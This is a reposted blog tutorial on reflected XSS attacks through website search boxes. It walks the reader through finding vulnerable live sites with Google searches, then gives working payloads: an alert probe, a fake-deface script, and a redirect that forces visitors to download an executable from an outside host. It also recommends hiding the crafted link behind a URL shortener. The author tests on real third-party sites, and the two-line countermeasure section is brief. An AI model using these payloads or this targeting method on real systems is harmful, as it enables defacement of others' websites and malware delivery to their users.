1. Found a Cross Site Scripting (XSS) vulnerable website, or
2. You can download the simple PHP file I have already create below (download link)
| Mediafire.com |
Step by Step :
1. You can use the PHP file I already put on mediafire.com for you test it on your own lab(use XAMPP), but for this tutorial I will use from real website on the wild internet (do not worry, the logic was the same, once you understand it you'll got the point)
2. Use Google to search for vulnerable website :
Pencarian was Indonesian language equal to searching, you can modify the Google parameter for search the much more specific website even in your own language.
3. To find a vulnerable website, you need to do a trial and error. I'm testing more than 5 website to test for their search feature is it vulnerable or not for XSS.
The simple method to test was using <h1> and <script>alert('x');</script> tag like example picture above.
4. If the website was vulnerable, you will find something like this.
Description :
1. I test other website and input the code <h1>TEST</h1> or <script>alert('x');</script> on search box.
2. The result was show a heading title, but I'm not sure, then
3. I check the selection source to make sure it's not a bold :-p
4. Oops..my query was purely processed by server without filtering 
5. Now we got the vulnerable website what to do next?? Did you know that with Cross Site Scripting (XSS) you also can do a defacing to a website by injecting some code in it?(not really deface/fake)
Description :
I put this script on search box to display the fake website deface.
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>
6. This Cross Site Scripting (XSS) Vulnerability also you can use to steal a session cookie, I will write the tutorial later
7. Now after we can do deface, show a heading tag, and alerting using javascript what next?
Let say I have a fake exe program that containing a malicious program and I host it on another website and I want some user download it. In this tutorial I will use putty.exe as a malicious program that can be downloaded from http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe. BTW putty was not a malicious program…in this case I only use it for testing purpose to make sure the attack was work.
Description :
On the search box I put the script :
<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script>
so the URL was like this : http://www.vulnerable-website.com/search?keyword=%3Cscript%3Edocument.location=%22http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe%22;%3C/script%3E\
8. It's too long 
so maybe some service that can make URL more short will be useful to make the link like this :
so maybe some service that can make URL more short will be useful to make the link like this :
http://goo.gl/T5tPh
9. From the step 7 and 8 can you imagine how if the attacker was use the real malicious file to harm user computer? or maybe the attacker combine it with backtrack metasploit like my other tutorial (view here)? only you who can answer it
If you still not clear for the tutorial above, you can view the video below:
Countermeasures/Prevention :
1. For developer : always filter user input and prevent some special characters being processed before filter it first.
2. For user : If you find unusual or strange environment from website you visited, it's better to leave it out.
Hope it's useful
- See more at: http://www.hacking-tutorial.com/hacking-tutorial/basic-hacking-via-cross-site-scripting-xss-the-logic/#sthash.589DCMGT.dpuf
No comments:
Post a Comment